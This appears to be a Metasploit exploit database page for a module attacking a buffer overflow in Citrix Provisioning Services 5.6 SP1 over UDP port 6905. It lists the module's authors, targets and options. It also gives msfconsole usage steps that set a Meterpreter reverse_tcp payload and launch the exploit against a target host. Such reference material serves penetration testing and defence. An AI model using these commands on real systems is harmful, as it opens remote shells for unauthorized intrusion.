Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow | Metasploit Exploit Database (DB)

Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow

This module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2, Windows 7, and Windows XP SP3.

Search Other Modules


Exploit Rank

  • Normal

Exploit Authors

  • AbdulAziz Hariri < >
  • alino < 26alino [at] gmail.com >

Vulnerability References


Exploit Targets

  • 0 - Citrix Provisioning Services 5.6 SP1 (default)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/misc/citrix_streamprocess_data_msg
msf exploit(citrix_streamprocess_data_msg) > show payloads
msf exploit(citrix_streamprocess_data_msg) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(citrix_streamprocess_data_msg) > set LHOST [MY IP ADDRESS]
msf exploit(citrix_streamprocess_data_msg) > set RHOST [TARGET IP]
msf exploit(citrix_streamprocess_data_msg) > exploit


Exploit Module Options

RHOST The target address
RPORT The target port (default: 6905)
CHOST The local client address
CPORT The local client port
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session